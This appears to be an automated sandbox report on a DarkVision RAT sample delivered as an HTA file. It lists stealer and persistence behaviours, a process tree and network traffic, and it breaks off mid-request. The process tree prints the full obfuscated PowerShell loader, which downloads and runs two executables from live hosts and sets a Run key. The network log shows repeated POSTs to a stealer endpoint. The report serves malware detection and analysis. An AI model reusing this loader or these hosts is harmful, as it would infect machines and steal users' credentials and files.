darkvision | c839ec03c9b07879980d362ba4615df453d6e5847baf8fb89e1d0f2c5bafb2b8

Analysis

max time kernel
95s
max time network
123s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
07/12/2024, 14:42 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

upgrade.hta
Size

25KB
MD5

03f88b6e5c92cf8865b13fb7495eac0a
SHA1

5f8a0e82674b25a9ef0f5d93f23075b1d7fb632b
SHA256

c839ec03c9b07879980d362ba4615df453d6e5847baf8fb89e1d0f2c5bafb2b8
SHA512

6d3baedcb209cbeb080c0a5bf31c33441f2c31f3fba77c95e7ff7c549db05871564fca22b30971e0e8465aa9822cb64a06ec7daa7911c7c9318ee4ebcd267d94
SSDEEP

192:b4sMlPX9+eCSEXxJckNfWMLAxdEW0UDqSbsCxLuoe23qNT2xZg6w0JGppinxDkdv:b4pX9+eCSEZLgi23q+gSIuq

Score

10^/10

darkvision collection discovery execution persistence rat spyware stealer

Malware Config

Extracted

Family

darkvision

5.206.227.213

Signatures

DarkVision Rat
DarkVision Rat is a trojan written in C++.
rat darkvision
Darkvision family
darkvision

Blocklisted process makes network request 2 IoCs

flow	pid	Process
14	640	powershell.exe
17	640	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	KNVYINNN.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	second.exe

Executes dropped EXE 6 IoCs

pid	Process
1704	KNVYINNN.exe
3456	pyexec.exe
3592	second.exe
1480	Virtual.exe
3724	pyexec.exe
1044	Virtual.exe

Loads dropped DLL 14 IoCs

pid	Process
3456	pyexec.exe
1480	Virtual.exe
1480	Virtual.exe
1480	Virtual.exe
1480	Virtual.exe
1480	Virtual.exe
3724	pyexec.exe
1044	Virtual.exe
1044	Virtual.exe
1044	Virtual.exe
1044	Virtual.exe
1044	Virtual.exe
1044	Virtual.exe
3540	BQE_Fast.exe

Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
spyware stealer

Data from Local System
T1005

Credentials in Registry
T1552.002
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook profiles 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	BQE_Fast.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\hzQtnaa = "C:\\Users\\Admin\\AppData\\Roaming\\KNVYINNN.exe"	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
640	powershell.exe
640	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 3724 set thread context of 2672	3724	pyexec.exe	90
PID 1044 set thread context of 4588	1044	Virtual.exe	102

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pyexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pyexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

pid	Process
640	powershell.exe
640	powershell.exe
3456	pyexec.exe
3724	pyexec.exe
3724	pyexec.exe
1480	Virtual.exe
2672	cmd.exe
2672	cmd.exe
1044	Virtual.exe
1044	Virtual.exe
4588	cmd.exe
4588	cmd.exe
3540	BQE_Fast.exe
3540	BQE_Fast.exe

Suspicious behavior: MapViewOfSection 4 IoCs

pid	Process
3724	pyexec.exe
1044	Virtual.exe
2672	cmd.exe
4588	cmd.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	640	powershell.exe

Suspicious use of WriteProcessMemory 33 IoCs

description	pid	Process	procid_target
PID 5052 wrote to memory of 640	5052	mshta.exe	82
PID 5052 wrote to memory of 640	5052	mshta.exe	82
PID 5052 wrote to memory of 640	5052	mshta.exe	82
PID 640 wrote to memory of 1704	640	powershell.exe	84
PID 640 wrote to memory of 1704	640	powershell.exe	84
PID 1704 wrote to memory of 3456	1704	KNVYINNN.exe	85
PID 1704 wrote to memory of 3456	1704	KNVYINNN.exe	85
PID 1704 wrote to memory of 3456	1704	KNVYINNN.exe	85
PID 640 wrote to memory of 3592	640	powershell.exe	87
PID 640 wrote to memory of 3592	640	powershell.exe	87
PID 3592 wrote to memory of 1480	3592	second.exe	88
PID 3592 wrote to memory of 1480	3592	second.exe	88
PID 3456 wrote to memory of 3724	3456	pyexec.exe	89
PID 3456 wrote to memory of 3724	3456	pyexec.exe	89
PID 3456 wrote to memory of 3724	3456	pyexec.exe	89
PID 3724 wrote to memory of 2672	3724	pyexec.exe	90
PID 3724 wrote to memory of 2672	3724	pyexec.exe	90
PID 3724 wrote to memory of 2672	3724	pyexec.exe	90
PID 3724 wrote to memory of 2672	3724	pyexec.exe	90
PID 1480 wrote to memory of 1044	1480	Virtual.exe	97
PID 1480 wrote to memory of 1044	1480	Virtual.exe	97
PID 1044 wrote to memory of 4588	1044	Virtual.exe	102
PID 1044 wrote to memory of 4588	1044	Virtual.exe	102
PID 1044 wrote to memory of 4588	1044	Virtual.exe	102
PID 1044 wrote to memory of 4588	1044	Virtual.exe	102
PID 2672 wrote to memory of 3540	2672	cmd.exe	105
PID 2672 wrote to memory of 3540	2672	cmd.exe	105
PID 2672 wrote to memory of 3540	2672	cmd.exe	105
PID 2672 wrote to memory of 3540	2672	cmd.exe	105
PID 4588 wrote to memory of 1992	4588	cmd.exe	106
PID 4588 wrote to memory of 1992	4588	cmd.exe	106
PID 4588 wrote to memory of 1992	4588	cmd.exe	106
PID 4588 wrote to memory of 1992	4588	cmd.exe	106

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	BQE_Fast.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\upgrade.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5052
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function gCKawp($xqETuHkBN, $cgpVK){[IO.File]::WriteAllBytes($xqETuHkBN, $cgpVK)};function TPUUAPTRh($xqETuHkBN){if($xqETuHkBN.EndsWith((odPEDz @(47359,47413,47421,47421))) -eq $True){Start-Process (odPEDz @(47427,47430,47423,47413,47421,47421,47364,47363,47359,47414,47433,47414)) $xqETuHkBN}else{Start-Process $xqETuHkBN}};function IogZmN($xqETuHkBN, $fYoQizCPx){[Microsoft.Win32.Registry]::SetValue((odPEDz @(47385,47388,47382,47402,47408,47380,47398,47395,47395,47382,47391,47397,47408,47398,47396,47382,47395,47405,47396,47424,47415,47429,47432,47410,47427,47414,47405,47390,47418,47412,47427,47424,47428,47424,47415,47429,47405,47400,47418,47423,47413,47424,47432,47428,47405,47380,47430,47427,47427,47414,47423,47429,47399,47414,47427,47428,47418,47424,47423,47405,47395,47430,47423)), $fYoQizCPx, $xqETuHkBN)};function MCNjOTFH($xqETuHkBN){$IVMCWJwi=(odPEDz @(47385,47418,47413,47413,47414,47423));$VGLgiVJ=(Get-ChildItem $xqETuHkBN -Force);$VGLgiVJ.Attributes=$VGLgiVJ.Attributes -bor ([IO.FileAttributes]$IVMCWJwi).value__};function oBvvmAnE($iXTtDfK){$GzBKYX = New-Object (odPEDz @(47391,47414,47429,47359,47400,47414,47411,47380,47421,47418,47414,47423,47429));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$cgpVK = $GzBKYX.DownloadData($iXTtDfK);return $cgpVK};function odPEDz($rGehVsA){$jtBdpZ=47313;$YWQUeqd=$Null;foreach($qyPsd in $rGehVsA){$YWQUeqd+=[char]($qyPsd-$jtBdpZ)};return $YWQUeqd};function WmSEp(){$lEPJgGls = $env:APPDATA + '\';$SCATfjY = oBvvmAnE (odPEDz @(47417,47429,47429,47425,47428,47371,47360,47360,47425,47430,47411,47358,47414,47362,47415,47412,47413,47410,47413,47369,47363,47368,47367,47413,47365,47368,47413,47415,47410,47413,47364,47415,47369,47363,47415,47366,47370,47364,47367,47411,47370,47412,47366,47364,47359,47427,47363,47359,47413,47414,47431,47360,47388,47391,47399,47402,47386,47391,47391,47391,47359,47414,47433,47414));$VQrLt = $lEPJgGls + 'KNVYINNN.exe';gCKawp $VQrLt $SCATfjY;TPUUAPTRh $VQrLt;$fYoQizCPx = 'hzQtnaa';IogZmN $VQrLt $fYoQizCPx;;$MfdAL = oBvvmAnE (odPEDz @(47417,47429,47429,47425,47428,47371,47360,47360,47425,47430,47411,47358,47412,47366,47410,47362,47369,47414,47411,47368,47367,47414,47361,47364,47365,47413,47369,47369,47369,47370,47370,47414,47362,47415,47365,47365,47415,47369,47366,47370,47410,47369,47365,47370,47359,47427,47363,47359,47413,47414,47431,47360,47428,47414,47412,47424,47423,47413,47359,47414,47433,47414));$NtudOlR = $lEPJgGls + 'second.exe';gCKawp $NtudOlR $MfdAL;TPUUAPTRh $NtudOlR;MCNjOTFH $NtudOlR;;;}WmSEp;
  2⤵
  - Blocklisted process makes network request
  - Adds Run key to start application
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:640
- - C:\Users\Admin\AppData\Roaming\KNVYINNN.exe
    "C:\Users\Admin\AppData\Roaming\KNVYINNN.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1704
  - - C:\Users\Admin\pyexec.exe
      "C:\Users\Admin\pyexec.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:3456
    - - C:\Users\Admin\AppData\Roaming\AltDaemon\pyexec.exe
        
        C:\Users\Admin\AppData\Roaming\AltDaemon\pyexec.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        Suspicious use of WriteProcessMemory
        
        PID:3724
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\SysWOW64\cmd.exe
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        Suspicious use of WriteProcessMemory
        
        PID:2672
        
        C:\Users\Admin\AppData\Local\Temp\BQE_Fast.exe
        
        C:\Users\Admin\AppData\Local\Temp\BQE_Fast.exe
        7⤵
        Loads dropped DLL
        Accesses Microsoft Outlook profiles
        Suspicious behavior: EnumeratesProcesses
        outlook_office_path
        
        PID:3540
- - C:\Users\Admin\AppData\Roaming\second.exe
    "C:\Users\Admin\AppData\Roaming\second.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3592
  - - C:\Users\Admin\Virtual.exe
      "C:\Users\Admin\Virtual.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:1480
    - - C:\Users\Admin\AppData\Roaming\RemoteSvc\Virtual.exe
        
        C:\Users\Admin\AppData\Roaming\RemoteSvc\Virtual.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        Suspicious use of WriteProcessMemory
        
        PID:1044
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\SysWOW64\cmd.exe
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        Suspicious use of WriteProcessMemory
        
        PID:4588
        
        C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe
        7⤵
        
        PID:1992

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:4780

Network

DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

28.118.140.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

28.118.140.52.in-addr.arpa

IN PTR

Response
DNS

182.129.81.91.in-addr.arpa

Remote address:

8.8.8.8:53

Request

182.129.81.91.in-addr.arpa

IN PTR

Response
DNS

4.159.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

4.159.190.20.in-addr.arpa

IN PTR

Response
DNS

pub-e1fcdad8276d47dfad3f82f5936b9c53.r2.dev

powershell.exe

Remote address:

8.8.8.8:53

Request

pub-e1fcdad8276d47dfad3f82f5936b9c53.r2.dev

IN A

Response

pub-e1fcdad8276d47dfad3f82f5936b9c53.r2.dev

IN A

162.159.140.237

pub-e1fcdad8276d47dfad3f82f5936b9c53.r2.dev

IN A

172.66.0.235
GET

https://pub-e1fcdad8276d47dfad3f82f5936b9c53.r2.dev/KNVYINNN.exe

powershell.exe

Remote address:

162.159.140.237:443

Request

GET /KNVYINNN.exe HTTP/1.1
Host: pub-e1fcdad8276d47dfad3f82f5936b9c53.r2.dev
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sat, 07 Dec 2024 14:42:12 GMT
Content-Type: application/x-msdownload
Content-Length: 6354975
Connection: keep-alive
Accept-Ranges: bytes
ETag: "e06afcdb16d22bd45bc3a5b01c96da3a"
Last-Modified: Fri, 15 Nov 2024 18:56:48 GMT
Server: cloudflare
CF-RAY: 8ee547e91edef667-LHR
DNS

237.140.159.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

237.140.159.162.in-addr.arpa

IN PTR

Response
DNS

pub-c5a18eb76e034d88899e1f44f859a849.r2.dev

powershell.exe

Remote address:

8.8.8.8:53

Request

pub-c5a18eb76e034d88899e1f44f859a849.r2.dev

IN A

Response

pub-c5a18eb76e034d88899e1f44f859a849.r2.dev

IN A

162.159.140.237

pub-c5a18eb76e034d88899e1f44f859a849.r2.dev

IN A

172.66.0.235
GET

https://pub-c5a18eb76e034d88899e1f44f859a849.r2.dev/second.exe

powershell.exe

Remote address:

162.159.140.237:443

Request

GET /second.exe HTTP/1.1
Host: pub-c5a18eb76e034d88899e1f44f859a849.r2.dev
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sat, 07 Dec 2024 14:42:15 GMT
Content-Type: application/x-msdownload
Content-Length: 4166425
Connection: keep-alive
Accept-Ranges: bytes
ETag: "47cb10ebf122aea1d817c5b57737c2fc"
Last-Modified: Fri, 15 Nov 2024 14:53:56 GMT
Server: cloudflare
CF-RAY: 8ee548006c85385f-LHR
DNS

104.219.191.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

104.219.191.52.in-addr.arpa

IN PTR

Response
DNS

18.31.95.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

18.31.95.13.in-addr.arpa

IN PTR

Response
DNS

50.23.12.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

50.23.12.20.in-addr.arpa

IN PTR

Response
DNS

172.214.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.214.232.199.in-addr.arpa

IN PTR

Response
DNS

172.214.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.214.232.199.in-addr.arpa

IN PTR
DNS

lomejorerty6.site

BQE_Fast.exe

Remote address:

8.8.8.8:53

Request

lomejorerty6.site

IN A

Response

lomejorerty6.site

IN A

104.21.72.125

lomejorerty6.site

IN A

172.67.184.161
POST

https://lomejorerty6.site/jean-yves-mvoto-mvoto?rvdvfl0bknt8=iCqMynCrGAwVrPuLuUPhq5h0iZr%2FqNXVrBccuzPRU45RkCBOjqij0uuLKXcrUSi%2B

BQE_Fast.exe

Remote address:

104.21.72.125:443

Request

POST /jean-yves-mvoto-mvoto?rvdvfl0bknt8=iCqMynCrGAwVrPuLuUPhq5h0iZr%2FqNXVrBccuzPRU45RkCBOjqij0uuLKXcrUSi%2B HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 96
Host: lomejorerty6.site

Response

HTTP/1.1 200 OK

Date: Sat, 07 Dec 2024 14:43:29 GMT
Transfer-Encoding: chunked
Connection: keep-alive
ie: sE5Hj2fZpflTDwMJNfwuhW0FxmMPrZUGSZeggG30
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i704QYOVlJV2d6gikRpH8iGCElIvtwk5bmh3vnehx1fCvsqYxX2BekXJ2nuYHKQFye8sodA75CR8Jdtb63or5LanxXBwlt8yeOUUx%2B1jrCptqBIP5avT9YFN35loRj%2FdT9eZrg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ee549cd7db7ede3-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=33243&min_rtt=28567&rtt_var=15051&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3299&recv_bytes=760&delivery_rate=121279&cwnd=253&unsent_bytes=0&cid=1c6c44d0dc18d10c&ts=401&x=0"
POST

https://lomejorerty6.site/jean-yves-mvoto-mvoto?rvdvfl0bknt8=iCqMynCrGAwVrPuLuUPhq5h0iZr%2FqNXVrBccuzPRU45RkCBOjqij0uuLKXcrUSi%2B

BQE_Fast.exe

Remote address:

104.21.72.125:443

Request

POST /jean-yves-mvoto-mvoto?rvdvfl0bknt8=iCqMynCrGAwVrPuLuUPhq5h0iZr%2FqNXVrBccuzPRU45RkCBOjqij0uuLKXcrUSi%2B HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
id: sE5Hj2fZpflTDwMJNfwuhW0FxmMPrZUGSZeggG30
Content-Length: 53
Host: lomejorerty6.site

Response

HTTP/1.1 200 OK

Date: Sat, 07 Dec 2024 14:43:29 GMT
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V0XdYw6eka8H3O9GjuA1jGvnI0cqBaKkDlLEldcNnnRci4S1RVwFOfPNVH3qguiyOvxWGPupnis5ftNaPxnj3pzQeVRebWzaMhGUanRYVIvJ66g20Gloan5b6X8GgYVPnSoyDg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ee549cfbe09ede3-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=29232&min_rtt=27142&rtt_var=1632&sent=73&recv=42&lost=0&retrans=0&sent_bytes=66459&recv_bytes=1246&delivery_rate=1637091&cwnd=257&unsent_bytes=0&cid=1c6c44d0dc18d10c&ts=483&x=0"
POST

https://lomejorerty6.site/jean-yves-mvoto-mvoto?rvdvfl0bknt8=iCqMynCrGAwVrPuLuUPhq5h0iZr%2FqNXVrBccuzPRU45RkCBOjqij0uuLKXcrUSi%2B

BQE_Fast.exe

Remote address:

104.21.72.125:443

Request

POST /jean-yves-mvoto-mvoto?rvdvfl0bknt8=iCqMynCrGAwVrPuLuUPhq5h0iZr%2FqNXVrBccuzPRU45RkCBOjqij0uuLKXcrUSi%2B HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
id: sE5Hj2fZpflTDwMJNfwuhW0FxmMPrZUGSZeggG30
Content-Length: 208
Host: lomejorerty6.site

Response

HTTP/1.1 204 No Content

Date: Sat, 07 Dec 2024 14:43:29 GMT
Connection: keep-alive
ie: sE5Hj2fZpflTDwMJNfwuhW0FxmMPrZUGSZeggG30
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8PEbcANWCrckIdQCzpR76FH9mbdGvuw9Av8vNFjDK8waDKDr6SpPmhlJ7QHpXeU2OA%2BvwgXi4NKUXkRcR%2B0ih5Atz1AdWP2g8%2BNOiX05BrC9AdnhOEE%2FTDnfXC1XkflJDuW58Q%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ee549d01f7eede3-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=29043&min_rtt=27142&rtt_var=1603&sent=76&recv=45&lost=0&retrans=0&sent_bytes=67305&recv_bytes=1888&delivery_rate=1637091&cwnd=257&unsent_bytes=0&cid=1c6c44d0dc18d10c&ts=541&x=0"
POST

https://lomejorerty6.site/jean-yves-mvoto-mvoto?rvdvfl0bknt8=iCqMynCrGAwVrPuLuUPhq5h0iZr%2FqNXVrBccuzPRU45RkCBOjqij0uuLKXcrUSi%2B

BQE_Fast.exe

Remote address:

104.21.72.125:443

Request

POST /jean-yves-mvoto-mvoto?rvdvfl0bknt8=iCqMynCrGAwVrPuLuUPhq5h0iZr%2FqNXVrBccuzPRU45RkCBOjqij0uuLKXcrUSi%2B HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
id: sE5Hj2fZpflTDwMJNfwuhW0FxmMPrZUGSZeggG30
Content-Length: 135746
Host: lomejorerty6.site

Response

HTTP/1.1 204 No Content

Date: Sat, 07 Dec 2024 14:43:30 GMT
Connection: keep-alive
ie: sE5Hj2fZpflTDwMJNfwuhW0FxmMPrZUGSZeggG30
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KgTBzyv2anxbrgcBVGoAmyB0rOkWmDyNCIwuouNWFV53AuVxo3lBgSHVguFxwp9Zdr%2B%2Bn9W29Fg%2FLkEhc3yHncVM7%2FdH5tu56PwuRpziMx%2FCOBIdJNrDaSXnQCcDVbEV5t%2BjYg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ee549d5dd8eede3-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=34893&min_rtt=27142&rtt_var=12904&sent=115&recv=148&lost=0&retrans=0&sent_bytes=68127&recv_bytes=138303&delivery_rate=1637091&cwnd=257&unsent_bytes=0&cid=1c6c44d0dc18d10c&ts=1583&x=0"
POST

https://lomejorerty6.site/jean-yves-mvoto-mvoto?rvdvfl0bknt8=iCqMynCrGAwVrPuLuUPhq5h0iZr%2FqNXVrBccuzPRU45RkCBOjqij0uuLKXcrUSi%2B

BQE_Fast.exe

Remote address:

104.21.72.125:443

Request

POST /jean-yves-mvoto-mvoto?rvdvfl0bknt8=iCqMynCrGAwVrPuLuUPhq5h0iZr%2FqNXVrBccuzPRU45RkCBOjqij0uuLKXcrUSi%2B HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
id: sE5Hj2fZpflTDwMJNfwuhW0FxmMPrZUGSZeggG30
Content-Length: 745
Host: lomejorerty6.site

Response

HTTP/1.1 204 No Content

Date: Sat, 07 Dec 2024 14:43:31 GMT
Connection: keep-alive
ie: sE5Hj2fZpflTDwMJNfwuhW0FxmMPrZUGSZeggG30
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cVIgreGBplWRok425Z6vrrSAmWIQb9teKxbl65VI0L36c8fqnC7m8PzwrypqG%2BURM3ND9fua%2FSSR5pYQlHTX2UGTVTjj2Fk%2Ft0QtjMBHa1uN1otD%2BMe8pl0fd1zS5ZsBLnxoTg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ee549d6f9bbede3-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=35165&min_rtt=27142&rtt_var=10222&sent=117&recv=150&lost=0&retrans=0&sent_bytes=68959&recv_bytes=139482&delivery_rate=1637091&cwnd=257&unsent_bytes=0&cid=1c6c44d0dc18d10c&ts=1646&x=0"
POST

https://lomejorerty6.site/jean-yves-mvoto-mvoto?rvdvfl0bknt8=iCqMynCrGAwVrPuLuUPhq5h0iZr%2FqNXVrBccuzPRU45RkCBOjqij0uuLKXcrUSi%2B

BQE_Fast.exe

Remote address:

104.21.72.125:443

Request

POST /jean-yves-mvoto-mvoto?rvdvfl0bknt8=iCqMynCrGAwVrPuLuUPhq5h0iZr%2FqNXVrBccuzPRU45RkCBOjqij0uuLKXcrUSi%2B HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
id: sE5Hj2fZpflTDwMJNfwuhW0FxmMPrZUGSZeggG30
Content-Length: 212
Host: lomejorerty6.site

Response

HTTP/1.1 204 No Content

Date: Sat, 07 Dec 2024 14:43:31 GMT
Connection: keep-alive
ie: sE5Hj2fZpflTDwMJNfwuhW0FxmMPrZUGSZeggG30
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w%2BSdjZN%2F4l%2BDvSh0YhPXP7hZExm6FvAQtFgkvolY4ICYu1aCnLuR%2B%2FVubtQ0MmfEybNkEwrDVwhRgBeYQHx8YB3N6CVjCrJlGVMUJqd%2Fp74Qf6mymlzZxTWu87o18GJWbiMS3A%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ee549d75b1cede3-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=35203&min_rtt=27142&rtt_var=7741&sent=119&recv=152&lost=0&retrans=0&sent_bytes=69787&recv_bytes=140128&delivery_rate=1637091&cwnd=257&unsent_bytes=0&cid=1c6c44d0dc18d10c&ts=1724&x=0"
POST

https://lomejorerty6.site/jean-yves-mvoto-mvoto?rvdvfl0bknt8=iCqMynCrGAwVrPuLuUPhq5h0iZr%2FqNXVrBccuzPRU45RkCBOjqij0uuLKXcrUSi%2B

BQE_Fast.exe

Remote address:

104.21.72.125:443

Request

POST /jean-yves-mvoto-mvoto?rvdvfl0bknt8=iCqMynCrGAwVrPuLuUPhq5h0iZr%2FqNXVrBccuzPRU45RkCBOjqij0uuLKXcrUSi%2B HTTP/1.1
Connection: Keep-Alive
Accept: */*
